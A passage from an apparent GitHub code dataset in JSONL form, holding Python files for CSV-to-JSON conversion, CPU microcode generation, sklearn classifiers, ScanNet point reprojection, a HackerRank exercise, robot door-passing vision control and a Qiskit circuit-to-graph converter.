json.loads(movie_data).get(\"actors\")\n print \"ok\"\n '''\n\n\n stringfile = json.dumps( [ row for row in movie_list ] , indent=4)\n movies_json = json.loads(stringfile)\n\n os.remove(self.filename)\n return movies_json\n\n def __find_username(self, row):\n for key in row.keys():\n if key.endswith(\" rated\"):\n return key\n return \"\"\n\n#----------------------------------------\n#Init\n#----------------------------------------\nif __name__ == \"__main__\":\n IMDBMovieJson('imdbmovies/temp/movies.csv').convert_csv_to_json()\n","repo_name":"AleUehara/moviestatz","sub_path":"core/movieimdb/moviejson.py","file_name":"moviejson.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20717364640","text":"# coding=utf-8\n\nimport os\nimport pin\nimport assembly as ASM\n\ndirname = os.path.dirname(__file__)\nfilename = os.path.join(dirname, 'micro.bin')\n\nmicro = [pin.HLT for _ in range(0x10000)]\n\nfor addr in range(0x10000):\n ir = addr >> 8\n psw = (addr >> 4) & 
0xf\n cyc = addr & 0xf\n\n if cyc < len(ASM.FETCH):\n micro[addr] = ASM.FETCH[cyc]\n\nwith open(filename, 'wb') as file:\n for var in micro:\n value = var.to_bytes(4, byteorder='little')\n file.write(value)\n\nprint('Compile micro instruction finish!!!')\n","repo_name":"StevenBaby/computer","sub_path":"cpu/26 取指令微程序/cpu/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":292,"dataset":"github-code","pt":"54"} +{"seq_id":"31616486058","text":"# encoding=utf-8\n# 调用sklearn库运行 k邻近 分类算法\n# 作者:dyxm\n\nfrom sklearn import neighbors\nfrom sklearn import datasets\n\n# 分类器\nknn = neighbors.KNeighborsClassifier()\n\n# 加载数据集\niris = datasets.load_iris()\n# print (iris)\n \n# 建立模型\nknn.fit(iris.data, iris.target)\n\n# 构建测试数据\nnewX = [0.1, 0.2, 0.3, 0.4]\n# 调用模型预测\npredictedLabel = knn.predict(newX)\n# 类别编号\nprint (predictedLabel)\n# 类别名\nprint ( iris.target_names[predictedLabel])","repo_name":"dyxm/machineLearning","sub_path":"kNeighbors/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"22316093382","text":"import pandas as pd\nfrom sklearn.datasets import load_digits\n\n#Creating load_digits object\ndigits = load_digits()\n#Looking for features of dataset\nprint(dir(digits))\nprint(digits.target_names)\n\n#Creating dataframe\ndf = pd.DataFrame(digits.data,columns=digits.feature_names)\nprint(df.head())\n\n#Creating target column in dataframe\ndf[\"target\"] = digits.target\nprint(df.head())\n\n#Creeating model\nX = df.drop([\"target\"],axis=\"columns\")\ny = df.target\n\nfrom sklearn.model_selection import train_test_split\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.2)\n\nfrom sklearn.svm import SVC\nmodel = SVC()\nmodel.fit(X_train,y_train)\nprint(model.score(X_test,y_test))\n\n\n\n\n\n","repo_name":"sametaslnts/Digits-Prediction-Clustering-with-Support-Vector-Machine","sub_path":"DigitsDatasets.py","file_name":"DigitsDatasets.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30309041021","text":"'''Check the reprojection from 3D to 2D images\nAuthor: Zhao Na\nDate: Sep 2019\n'''\nimport os\nimport random\nimport numpy as np\nimport cv2\nfrom PIL import Image\nimport json\nfrom zipfile import ZipFile\nimport matplotlib.pyplot as plt\nfrom mayavi import mlab\nfrom vtk_visualizer.plot3d import *\nfrom vtk_visualizer import get_vtk_control\n\nimport scannet_utils\n\n\nif __name__ == '__main__':\n\n DATA_DIR = '/mnt/Data/Datasets/ScanNet_v2/scans/'\n\n # SCAN_NAMES = [line.rstrip() for line in open('/mnt/Data/Datasets/ScanNet_v1/sceneid_sort.txt')]\n SCAN_NAMES = ['scene0000_00']\n\n for scan_id, scan_name in enumerate(SCAN_NAMES):\n print('====== Process {0}-th scan [{1}] ======'.format(scan_id, scan_name))\n scan_path = os.path.join(DATA_DIR, scan_name)\n\n # parse the camera intrinsic file\n ## WHY the parameters from intrinsic_color.txt are different from those in scene_id.txt file??\n ## The one in scene_id.txt should be after camera calibration (undistortion)\n\n # ### Load from intrinsic_color.txt\n # camera_intrinsic_path = os.path.join(scan_path, 'intrinsic', 'intrinsic_color.txt')\n # camera_intrinsic = np.loadtxt(camera_intrinsic_path)[:3,:]\n\n ### Load from scene_id.txt\n meta_file = os.path.join(scan_path, '{0}.txt'.format(scan_name))\n 
camera_intrinsic = scannet_utils.read_camera_intrinsic(meta_file)\n\n # parse the mesh file\n mesh_file = os.path.join(scan_path, '{0}_vh_clean_2.ply'.format(scan_name))\n mesh_vertices = scannet_utils.read_mesh_vertices_rgb(mesh_file)\n\n ## visualize-1\n # plotxyzrgb(mesh_vertices, block=True)\n\n ## visualize-2\n fig = mlab.figure(figure=None, bgcolor=(0, 0, 0), fgcolor=None, engine=None, size=(1000, 1000))\n mlab.points3d(mesh_vertices[:, 0], mesh_vertices[:, 1], mesh_vertices[:, 2], mesh_vertices[:, 2], mode='point',\n colormap='gnuplot', figure=fig)\n mlab.points3d(0, 0, 0, color=(1, 1, 1), mode='sphere', scale_factor=0.3)\n mlab.orientation_axes()\n mlab.show()\n\n pts = np.ones((mesh_vertices.shape[0], 4))\n pts[:, 0:3] = mesh_vertices[:, 0:3]\n\n framenames = os.listdir(os.path.join(scan_path, 'color'))\n for frame_idx in framenames:\n instance_img_path = os.path.join(scan_path, 'instance-filt', '{0}.png'.format(frame_idx))\n\n ## the matrix in /pose/.txt is to map the camera coord to world coord\n camera_extrinsic_path = os.path.join(scan_path, 'pose', '{0}.txt'.format(frame_idx))\n camera_extrinsic = np.loadtxt(camera_extrinsic_path) #4*4\n # transform from world coordinate to camera coordinate\n pts_camera = np.dot(pts, np.linalg.inv(camera_extrinsic).transpose()) #N*4\n\n ## visualize-1\n vtkControl = get_vtk_control(True)\n plotxyzrgb(np.hstack((pts_camera[:,:3], mesh_vertices[:,3:6])))\n vtkControl.AddAxesActor(1.0)\n vtkControl.exec_()\n\n ## visualize-2\n # fig = mlab.figure(figure=None, bgcolor=(0,0,0), fgcolor=None, engine=None, size=(1000, 1000))\n # mlab.points3d(pts_camera[:, 0], pts_camera[:, 1], pts_camera[:, 2], pts_camera[:, 2], mode='point',\n # colormap='gnuplot', figure=fig)\n # mlab.points3d(0, 0, 0, color=(1, 1, 1), mode='sphere', scale_factor=0.3)\n # mlab.orientation_axes()\n # mlab.show()\n\n # transform from camera coordinate to pixel coordinate\n pts_pixel = np.dot(pts_camera, camera_intrinsic.transpose()) #N*3\n pts_pixel[:, 0] /= pts_pixel[:, 2]\n pts_pixel[:, 1] /= pts_pixel[:, 2]\n valid_mask = (pts_pixel[:,0] >= 0) & (pts_pixel[:,0]<=1296) & (pts_pixel[:,1]>=0)& (pts_pixel[:,1]<=968) \\\n & (pts_pixel[:,2]>0)\n pts_image = pts_pixel[valid_mask, :]\n depth = pts_image[:,2]\n plotxyzrgb(np.hstack((pts_image, mesh_vertices[valid_mask, 3:6])), block=True)\n\n # visualize the reprojected points on color frame\n rgb_img = instance_img_path.replace('instance-filt', 'color').replace('png', 'jpg')\n rgb_img = cv2.imread(rgb_img)\n rgb_img = cv2.cvtColor(rgb_img, cv2.COLOR_BGR2RGB)\n\n cmap = plt.cm.get_cmap('hsv', 256)\n cmap = np.array([cmap(i) for i in range(256)])[:, :3] * 255\n\n for i in range(pts_image.shape[0]):\n d = depth[i]\n color = cmap[int(120.0 / d), :]\n cv2.circle(rgb_img, (int(np.round(pts_image[i, 0])), int(np.round(pts_image[i, 1]))), 2,\n color=tuple(color), thickness=-1)\n Image.fromarray(rgb_img).show()","repo_name":"Na-Z/3DMVGOD","sub_path":"data/scannet/check_reprojection.py","file_name":"check_reprojection.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"8707568988","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 6 10:22:29 2020\n\n@author: suryakantkumar\n\"\"\"\n\n'''\nProblem : Alice and Bob each created one problem for HackerRank. 
A reviewer rates the two challenges, \nawarding points on a scale from 1 to 100 for three categories: problem clarity, originality, and difficulty.\n\nWe define the rating for Alice's challenge to be the triplet a = (a[0], a[1], a[2]), \nand the rating for Bob's challenge to be the triplet b = (b[0], b[1], b[2]).\n\nYour task is to find their comparison points by comparing a[0] with b[0], a[1] with b[1], and a[2] with b[2].\n\nIf a[i] > b[i], then Alice is awarded 1 point.\nIf a[i] < b[i], then Bob is awarded 1 point.\nIf a[i] = b[i], then neither person receives a point.\nComparison points is the total points a person earned.\n\nGiven a and b, determine their respective comparison points.\n\nFor example, a = [1, 2, 3] and b = [3, 2, 1]. For elements 0, Bob is awarded a point because a[0] < b[0]. \nFor the equal elements a[1] and b[1], no points are earned. Finally, for elements 2, a[2] > b[2] so Alice receives a point. \nYour return array would be [1, 1] with Alice's score first and Bob's second.\n'''\n\n\nimport os\n\ndef compareTriplets(a, b):\n point_a = 0\n point_b = 0\n \n for i in range(len(a)):\n if a[i] > b[i]:\n point_a += 1\n \n elif a[i] < b[i]:\n point_b += 1\n \n return point_a, point_b\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n a = list(map(int, input().rstrip().split()))\n b = list(map(int, input().rstrip().split()))\n result = compareTriplets(a, b)\n fptr.write(' '.join(map(str, result)))\n fptr.write('\\n')\n fptr.close()\n \n","repo_name":"SuryakantKumar/HackerRank-Problem-Solving","sub_path":"Easy Level/Compare-The-Triplets.py","file_name":"Compare-The-Triplets.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"13415211559","text":"# ###################### 过 门-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-\ndoor_flag = True\nAngle = 0\nangle_top = 0\nBottom_center_y = 0\nBottom_center_x = 0\nTop_center_x = 0\nTop_center_y = 0\nTop_lenth = 0\ncamera_choice = \"Head\"\n\n\ndef door_act_move():\n global step, state, reset, skip\n global door_flag\n global real_test\n global camera_choice\n global Angle, angle_top, Bottom_center_y, Bottom_center_x, Top_center_y, Top_center_x, Top_lenth \n \n step0_far = 130\n step0_close = 24\n step0_angle_top_R = -8\n step0_angle_top_L = 8\n step0_top_center_x_L = 365\n step0_top_center_x_R = 315\n step0_delta = 30 \n step0_turn_times = 3\n\n step1_angle_top_L = 3\n step1_angle_top_R = -3\n step1_head_bottom_x_F = 310\n step1_head_bottom_x_B = 340\n step1_delta = 20\n step1_close = 375\n\n step2_get_close = 5\n\n if step == 0: # 接近 看下边沿 角度 Chest_percent > 5\n if door_flag == False:\n print(\"1346L step=0 什么也没有看到,向左转45° turn005L\")\n if real_test:\n action_append(\"turn005L\")\n time.sleep(sleep_time_s)\n\n elif Top_center_y > 160:\n print(\"1352L step = 0 距离门很远, 快走靠近 fastForward03 Top_center_y={} > 150\".format(Top_center_y))\n if real_test:\n action_append(\"fast_forward_step\")\n action_append(\"turn001R\")\n action_append(\"fast_forward_step\")\n time.sleep(sleep_time_l)\n\n elif Top_center_y > step0_far:\n print(\"1360L step = 0 再往前一些,慢走 fast_forward_step Top_center_y={} > {}\".format(Top_center_y, step0_far))\n if real_test:\n action_append(\"fast_forward_step\")\n time.sleep(sleep_time_l)\n\n elif Top_center_y < step0_close:\n print(\"1366L step = 0 距离门很近了, 后退一点 Back2Run Top_center_y={} < {}\".format(Top_center_y, step0_close))\n if real_test:\n action_append(\"Back2Run\")\n 
time.sleep(sleep_time_l)\n\n elif angle_top < step0_angle_top_R:\n print(\"1372L step = 0 方向偏了, 向左转 turn001L angel_top = {} < {}\".format(angle_top, step0_angle_top_R))\n if real_test:\n action_append(\"turn001L\")\n\n elif angle_top > step0_angle_top_L:\n print(\"1377L step = 0 方向偏了, 向右转 turn001R angel_top = {} > {}\".format(angle_top, step0_angle_top_L))\n if real_test:\n action_append(\"turn001R\")\n\n elif Top_center_x > step0_top_center_x_L:\n if Top_center_x > step0_top_center_x_L + step0_delta:\n print(\"1383L step = 0 站位很偏了, 向右移, Right3move Top_center_x = {} > {}\".format(Top_center_x, step0_top_center_x_L+step0_delta))\n if real_test:\n action_append(\"Right3move\")\n time.sleep(sleep_time_s)\n else:\n print(\"1388L step = 0 站位偏了, 向右移, Right2move Top_center_x = {} > {}\".format(Top_center_x, step0_top_center_x_L))\n if real_test:\n action_append(\"Right02move\")\n time.sleep(sleep_time_s)\n elif Top_center_x < step0_top_center_x_R:\n if Top_center_x < step0_top_center_x_R - step0_delta:\n print(\"1394L step = 0 站位很偏了, 向左移, Left3move Top_center_x = {} < {}\".format(Top_center_x, step0_top_center_x_R - step0_delta))\n if real_test:\n action_append(\"Left3move\")\n time.sleep(sleep_time_s)\n else:\n print(\"1399L step = 0 站位偏了, 向左移, Left02move Top_center_x = {} < {}\".format(Top_center_x, step0_top_center_x_R))\n if real_test:\n action_append(\"Left02move\")\n time.sleep(sleep_time_s)\n\n else:\n print(\"1405L 进入下一阶段, 调整侧身 turn005R x {} HeadTurn185\".format(step0_turn_times))\n # cv2.waitKey(0)\n if real_test:\n for i in range(0, step0_turn_times):\n action_append(\"turn005R\")\n time.sleep(sleep_time_l)\n\n # action_append(\"turn004R\")\n # action_append(\"turn001R\")\n # action_append(\"turn001R\")\n action_append(\"HeadTurn185\")\n time.sleep(sleep_time_l)\n step = 1\n \n elif step == 1:\n if Top_lenth < 100:\n print(\"1421L 歪了! 
左转, 再向右移\")\n if real_test:\n action_append(\"Back1Run\")\n action_append(\"Right02move\")\n\n elif angle_top > step1_angle_top_L or 0 < Angle < 85:\n print(\"1427L step = 1, 方向偏了, 向右转 turn000R angle_top={} > {}\".format(angle_top, step1_angle_top_L))\n if real_test:\n action_append(\"turn001R\")\n time.sleep(sleep_time_l)\n elif angle_top < step1_angle_top_R or -85 < Angle < 0 :\n print(\"1432L step = 1 方向偏了, 向左转 turn000L angle_top={} < {}\".format(angle_top, step1_angle_top_R))\n if real_test:\n action_append(\"turn001L\")\n time.sleep(sleep_time_l)\n \n elif Bottom_center_x < step1_head_bottom_x_F:\n if Bottom_center_x < step1_head_bottom_x_F - step1_delta:\n print(\"1439L step = 1 站位很靠前了,向后移 Back2Run Bottom_center_x={} < {}\".format(Bottom_center_x, step1_head_bottom_x_F - step1_delta))\n if real_test:\n action_append(\"Back2Run\")\n time.sleep(sleep_time_s)\n else:\n print(\"1444L step = 1 站位靠前了,向后移 Back1Run Bottom_center_x={} < {}\".format(Bottom_center_x, step1_head_bottom_x_F))\n if real_test:\n action_append(\"Back1Run\")\n time.sleep(sleep_time_s)\n \n elif Bottom_center_x > step1_head_bottom_x_B:\n if Bottom_center_x > step1_head_bottom_x_B + step1_delta:\n print(\"1451L step = 1 站位很靠后了,向前移 Forwalk01 Bottom_center_x={} > {}\".format(Bottom_center_x, step1_head_bottom_x_B + step1_delta))\n if real_test:\n action_append(\"Forwalk01\")\n time.sleep(sleep_time_s)\n else:\n print(\"1456L step = 1 站位靠后了,向前移 Forwalk01 Bottom_center_x={} > {}\".format(Bottom_center_x, step1_head_bottom_x_B))\n if real_test:\n action_append(\"Forwalk01\")\n time.sleep(sleep_time_s)\n\n elif Bottom_center_y < step1_close:\n print(\"1462L step = 1, 靠近门, Left3move Bottom_center_y={} < {}\".format(Bottom_center_y, step1_close))\n if real_test:\n action_append(\"Left3move\")\n time.sleep(sleep_time_l)\n \n elif Bottom_center_y > step1_close:\n print(\"1468L 已经接近门了,进入下一阶段,摸黑过门, Bottom_center_y = {} > {}\".format(Bottom_center_y, step1_close))\n step = 2\n\n elif step == 2:\n print(\"-------/////////////////过门 Left3move x 4\")\n # action_append(\"Back2Run\")\n for i in range(0, step2_get_close):\n if real_test:\n action_append(\"Left3move\")\n time.sleep(sleep_time_l)\n # print(\"向后退一点! Back1Run\")\n # if real_test:\n # action_append(\"Back1Run\")\n\n # cv2.waitKey(0)\n\n for i in range(0, 7):\n if real_test:\n action_append(\"Left3move\")\n if i==3:\n action_append(\"turn001R\")\n action_append(\"turn001R\")\n time.sleep(sleep_time_l)\n\n # cv2.waitKey(0)\n\n print(\"完成! 
\")\n\n if real_test:\n for i in range(0, step0_turn_times):\n action_append(\"turn005L\")\n time.sleep(sleep_time_l)\n action_append(\"HeadTurnMM\")\n action_append(\"fast_forward_step\")\n \n state = -1\n\n\ndef into_the_door():\n global state_sel, org_img, step, reset, skip, debug, chest_ret, HeadOrg_img, state\n global door_flag\n global camera_choice\n global Angle, angle_top, Bottom_center_y, Bottom_center_x, Top_center_x, Top_center_y, Top_lenth\n step = 0\n state = 5\n\n\n r_w = chest_r_width\n r_h = chest_r_height\n \n\n print(\"/-/-/-/-/-/-/-/-/-开始过门\")\n\n while(state == 5):\n Area = []\n if camera_choice == \"Chest\":\n # print(\"胸部相机\")\n chest_OrgFrame = np.rot90(ChestOrg_img)\n Img_copy = chest_OrgFrame.copy()\n\n elif camera_choice == \"Head\":\n # print(\"头部相机\")\n Img_copy = HeadOrg_img.copy()\n # Img_copy = cv2.resize(border, (r_w, r_h), interpolation=cv2.INTER_CUBIC)\n # Img_copy = Head_OrgFrame\n \n \n Frame_gauss = cv2.GaussianBlur(Img_copy, (3, 3), 0) # 高斯模糊\n Frame_hsv = cv2.cvtColor(Frame_gauss, cv2.COLOR_BGR2HSV) # 将图片转换到HSV空间\n if camera_choice == \"Chest\":\n Frame_blue = cv2.inRange(Frame_hsv, color_range['chest_blue_door'][0], color_range['chest_blue_door'][1]) # 对原图像和掩模(颜色的字典)进行位运算\n elif camera_choice == \"Head\":\n Frame_blue = cv2.inRange(Frame_hsv, color_range['head_blue_door'][0], color_range['head_blue_door'][1]) # 对原图像和掩模(颜色的字典)进行位运算\n Opened = cv2.morphologyEx(Frame_blue, cv2.MORPH_OPEN, np.ones((1, 1), np.uint8)) # 开运算 去噪点\n Closed = cv2.morphologyEx(Opened, cv2.MORPH_CLOSE, np.ones((5, 5), np.uint8)) # 闭运算 封闭连接\n Closed = cv2.dilate(Closed, np.ones((5, 5), np.uint8), iterations=3)\n if img_debug:\n cv2.imshow(\"Imask\", Closed)\n\n _, contours, hierarchy = cv2.findContours(Closed, cv2.RETR_LIST,cv2.CHAIN_APPROX_NONE) # 找出轮廓cv2.CHAIN_APPROX_NONE\n\n if len(contours) == 0:\n print(\"没有找到门!\")\n door_flag = False\n \n else:\n door_flag = True\n for i in range(0,len(contours)):\n #print(\"len[Chest_contours]={}——i:{}\".format(len(Chest_contours), i))\n area = cv2.contourArea(contours[i])\n if 2000 < area < 640 * 480 * 0.45:\n Area.append((area,i))\n \n # print(\"area{} = {}\".format(i, area))\n # cv2.imshow(\"Processed\", Img_copy)\n # cv2.waitKey(0)\n # cv2.drawContours(Img_copy, contours, -1, (0, 0, 255), 1)\n\n AreaMaxContour, Area_max = getAreaMaxContour1(contours)\n\n\n if step != 2 and camera_choice == \"Head\":\n Rect = cv2.minAreaRect(AreaMaxContour)\n Box = np.int0(cv2.boxPoints(Rect))\n\n cv2.drawContours(Img_copy, [Box], -1, (255, 200, 100), 2)\n\n Top_left = AreaMaxContour[0][0]\n Top_right = AreaMaxContour[0][0]\n Bottom_left = AreaMaxContour[0][0]\n Bottom_right = AreaMaxContour[0][0]\n for c in AreaMaxContour: # 遍历找到四个顶点\n if c[0][0] + 1.5 * c[0][1] < Top_left[0] + 1.5 * Top_left[1]:\n Top_left = c[0]\n if (r_w - c[0][0]) + 1.5 * c[0][1] < (r_w - Top_right[0]) + 1.5 * Top_right[1]:\n Top_right = c[0]\n if c[0][0] + 1.5 * (r_h - c[0][1]) < Bottom_left[0] + 1.5 * (r_h - Bottom_left[1]):\n Bottom_left = c[0]\n if c[0][0] + 1.5 * c[0][1] > Bottom_right[0] + 1.5 * Bottom_right[1]:\n Bottom_right = c[0]\n\n angle_top = - math.atan(\n (Top_right[1] - Top_left[1]) / (Top_right[0] - Top_left[0])) * 180.0 / math.pi\n\n Top_lenth = abs(Top_right[0] - Top_left[0])\n Top_center_x = int((Top_right[0] + Top_left[0]) / 2)\n Top_center_y = int((Top_right[1] + Top_left[1]) / 2)\n Bottom_center_x = int((Bottom_right[0] + Bottom_left[0]) / 2)\n Bottom_center_y = int((Bottom_right[1] + Bottom_left[1]) / 2)\n\n cv2.circle(Img_copy, (Top_right[0], 
Top_right[1]), 5, [0, 255, 255], 2)\n cv2.circle(Img_copy, (Top_left[0], Top_left[1]), 5, [0, 255, 255], 2)\n cv2.circle(Img_copy, (Bottom_right[0], Bottom_right[1]), 5, [0, 255, 255], 2)\n cv2.circle(Img_copy, (Bottom_left[0], Bottom_left[1]), 5, [0, 255, 255], 2)\n cv2.circle(Img_copy, (Top_center_x, Top_center_y), 5, [0, 255, 255], 2)\n cv2.circle(Img_copy, (Bottom_center_x, Bottom_center_y), 5, [0, 255, 255], 2)\n cv2.line(Img_copy, (Top_center_x, Top_center_y),\n (Bottom_center_x, Bottom_center_y), [0, 255, 255], 2) # 画出上下中点连线\n \n if math.fabs(Top_center_x - Bottom_center_x) <= 1: # 得到连线的角度\n Angle = 90\n else:\n Angle = - math.atan((Top_center_y - Bottom_center_y) / (\n Top_center_x - Bottom_center_x)) * 180.0 / math.pi\n\n\n if img_debug:\n cv2.putText(Img_copy, \"angle_top:\" + str(int(angle_top)), (30, 425), cv2.FONT_HERSHEY_SIMPLEX, 0.65,(0, 0, 255), 2)\n cv2.putText(Img_copy, \"Head_bottom_center(x,y): \" + str(int(Bottom_center_x)) + \" , \" + str(int(Bottom_center_y)), (30, 450), cv2.FONT_HERSHEY_SIMPLEX, 0.65, (0, 0, 255), 2) # (0, 0, 255)BGR\n cv2.putText(Img_copy,\"Head_top_center(x,y): \" + str(int(Top_center_x)) + \" , \" + str(int(Top_center_y)),(30, 470), cv2.FONT_HERSHEY_SIMPLEX, 0.65, (0, 0, 255), 2) # (0, 0, 255)BGR\n cv2.putText(Img_copy, \"Angle:\" + str(int(Angle)), (30, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.65, (0, 0, 255), 2) # (0, 0, 255)BGR\n cv2.putText(Img_copy, \"Top_lenth:\" + str(int(Top_lenth)), (400, 20), cv2.FONT_HERSHEY_SIMPLEX,0.65, (0, 0, 255), 2) # (0, 0, 255)BGR\n\n if img_debug:\n cv2.imshow(\"Processed\", Img_copy)\n cv2.waitKey(10)\n\n door_act_move()\n print(\"state={}\".format(state))\n\n \n\n # if len(Area) > 2:\n # Area = find_two(Area)\n \n # elif len(Area) < 2:\n # door_found = False\n # print(\"没有发现门框,调用头部相机\")\n # camera_choice = \"Head\"\n # # cv2.drawContours(Img_copy, Chest_contours[Area[0][1]], -1, (0, 0, 255), 1)\n\n # if len(Area) == 2:\n # door_found = True\n # Chest_rect1 = cv2.minAreaRect(Chest_contours[Area[0][1]])\n # Chest_box1 = np.int0(cv2.boxPoints(Chest_rect1))\n # Chest_rect2 = cv2.minAreaRect(Chest_contours[Area[1][1]])\n # Chest_box2 = np.int0(cv2.boxPoints(Chest_rect2))\n\n # cv2.drawContours(Img_copy, [Chest_box1], -1, (255, 200, 100), 2)\n # cv2.drawContours(Img_copy, [Chest_box2], -1, (255, 200, 100), 2)\n\n # Chest_top_left1 = Chest_contours[Area[0][1]][0][0]\n # Chest_top_right1 = Chest_contours[Area[0][1]][0][0]\n # Chest_bottom_left1 = Chest_contours[Area[0][1]][0][0]\n # Chest_bottom_right1 = Chest_contours[Area[0][1]][0][0]\n # for c in Chest_contours[Area[0][1]]: # 遍历找到四个顶点\n # if c[0][0] + 1.5 * c[0][1] < Chest_top_left1[0] + 1.5 * Chest_top_left1[1]:\n # Chest_top_left1 = c[0]\n # if (r_w - c[0][0]) + 1.5 * c[0][1] < (r_w - Chest_top_right1[0]) + 1.5 * Chest_top_right1[1]:\n # Chest_top_right1 = c[0]\n # if c[0][0] + 1.5 * (r_h - c[0][1]) < Chest_bottom_left1[0] + 1.5 * (r_h - Chest_bottom_left1[1]):\n # Chest_bottom_left1 = c[0]\n # if c[0][0] + 1.5 * c[0][1] > Chest_bottom_right1[0] + 1.5 * Chest_bottom_right1[1]:\n # Chest_bottom_right1 = c[0]\n # cv2.circle(Img_copy, (Chest_top_right1[0], Chest_top_right1[1]), 5, [0, 255, 255], 2)\n # cv2.circle(Img_copy, (Chest_top_left1[0], Chest_top_left1[1]), 5, [0, 255, 255], 2)\n # cv2.circle(Img_copy, (Chest_bottom_right1[0], Chest_bottom_right1[1]), 5, [0, 255, 255], 2)\n # cv2.circle(Img_copy, (Chest_bottom_left1[0], Chest_bottom_left1[1]), 5, [0, 255, 255], 2)\n # angle_Right = - math.atan(\n # (Chest_top_left1[1] - Chest_bottom_left1[1]) / (Chest_top_left1[0] - 
Chest_bottom_left1[0])) * 180.0 / math.pi\n\n\n # Chest_top_left2 = Chest_contours[Area[1][1]][0][0]\n # Chest_top_right2 = Chest_contours[Area[1][1]][0][0]\n # Chest_bottom_left2 = Chest_contours[Area[1][1]][0][0]\n # Chest_bottom_right2 = Chest_contours[Area[1][1]][0][0]\n # for c in Chest_contours[Area[1][1]]: # 遍历找到四个顶点\n # if c[0][0] + 1.5 * c[0][1] < Chest_top_left2[0] + 1.5 * Chest_top_left2[1]:\n # Chest_top_left2 = c[0]\n # if (r_w - c[0][0]) + 1.5 * c[0][1] < (r_w - Chest_top_right2[0]) + 1.5 * Chest_top_right2[1]:\n # Chest_top_right2 = c[0]\n # if c[0][0] + 1.5 * (r_h - c[0][1]) < Chest_bottom_left2[0] + 1.5 * (r_h - Chest_bottom_left2[1]):\n # Chest_bottom_left2 = c[0]\n # if c[0][0] + 1.5 * c[0][1] > Chest_bottom_right2[0] + 1.5 * Chest_bottom_right2[1]:\n # Chest_bottom_right2 = c[0]\n # cv2.circle(Img_copy, (Chest_top_right2[0], Chest_top_right2[1]), 5, [0, 255, 255], 2)\n # cv2.circle(Img_copy, (Chest_top_left2[0], Chest_top_left2[1]), 5, [0, 255, 255], 2)\n # cv2.circle(Img_copy, (Chest_bottom_right2[0], Chest_bottom_right2[1]), 5, [0, 255, 255], 2)\n # cv2.circle(Img_copy, (Chest_bottom_left2[0], Chest_bottom_left2[1]), 5, [0, 255, 255], 2)\n # angle_Left = - math.atan(\n # (Chest_top_right2[1] - Chest_bottom_right2[1]) / (Chest_top_right2[0] - Chest_bottom_right2[0])) * 180.0 / math.pi\n \n # Chest_top_center_x = int((Chest_top_right2[0] + Chest_top_left1[0]) / 2)\n # Chest_top_center_y = int((Chest_top_right2[1] + Chest_top_left1[1]) / 2)\n # cv2.circle(Img_copy, (Chest_top_center_x, Chest_top_center_y), 5, [0, 255, 255], 2)\n\n # cv2.putText(Img_copy, \"Chest_top_center(x,y): \" + str(int(Chest_top_center_x)) + \" , \" + str(\n # int(Chest_top_center_y)), (30, 400), cv2.FONT_HERSHEY_SIMPLEX, 0.65, (0, 0, 255), 2)\n # cv2.putText(Img_copy, \"angle_left:\" + str(int(angle_Left)), (30, 425), cv2.FONT_HERSHEY_SIMPLEX, 0.65,\n # (0, 0, 255), 2) # (0, 0, 255)BGR\n # cv2.putText(Img_copy, \"angle_right:\" + str(int(angle_Right)), (30, 460), cv2.FONT_HERSHEY_SIMPLEX,\n # 0.65, (0, 0, 255), 2)","repo_name":"personqianduixue/2021-Running-Robot","sub_path":"RunningRobot/yky/过门(哈工深).py","file_name":"过门(哈工深).py","file_ext":"py","file_size_in_byte":19303,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"38752525999","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 28 12:37:42 2020\n\n@author: zxz58\n\"\"\"\nimport networkx as nx\nfrom cir_input.qasm import CreateCircuitFromQASM\nfrom qiskit.quantum_info.operators import Operator\nfrom cir_input.gate_operation import OperationCNOT, OperationSingle\nimport numpy as np\n\ndef CreateDGfromQASMfile(QASM_file, path,\n flag_single=True,\n flag_interaction=False):\n '''\n convert QASM file to cir and DG\n \n DG is a directed graph where each node represents a quantum gate and egde\n dependency\n if you want to get the u_matrix of a node i,\n use DG.nodes[i]['operation'].u_matrix\n \n if you want to get a list of node i in whcih each element represents\n the qubit index where the gate in node i operates,\n use DG.nodes[i]['operation'].involve_qubits_list\n \n if you want to get the qiskit gate data of a node i,\n use DG.nodes[i]['operation'].qiskit_data\n \n flag_single: whether we should convert single qubit gate\n flag_interaction: whether we should generate interaction matrix in which\n each entry represents # CNOT between column and raw qubits. 
It can be\n invoked by 'DG.interaction_matrix'\n output:\n circuit, (DG, num_unidentified_gates)\n '''\n cir = CreateCircuitFromQASM(QASM_file, path)\n res = QiskitCircuitToDG(cir, flag_single, flag_interaction)\n return cir, res\n\ndef QiskitCircuitToDG(cir, flag_single=False, flag_interaction=False):\n '''\n convert Qiskit circuit to DG\n support only CNOT and single qubit gates\n flag_single: whether we should convert single qubit gate\n '''\n operations = []\n num_unidentified_gates = 0\n qregs = cir.qregs\n if len(qregs) > 1:\n raise Exception('quantum circuit has more than 1 quantum register')\n q = qregs[0]\n interaction_matrix = np.zeros((len(q), len(q))) if flag_interaction == True else None\n data = cir.data\n for gate in data:\n if flag_interaction == True:\n if len(gate[1]) == 2:\n interaction_matrix[gate[1][0].index][gate[1][1].index] += 1\n interaction_matrix[gate[1][1].index][gate[1][0].index] += 1\n operation = 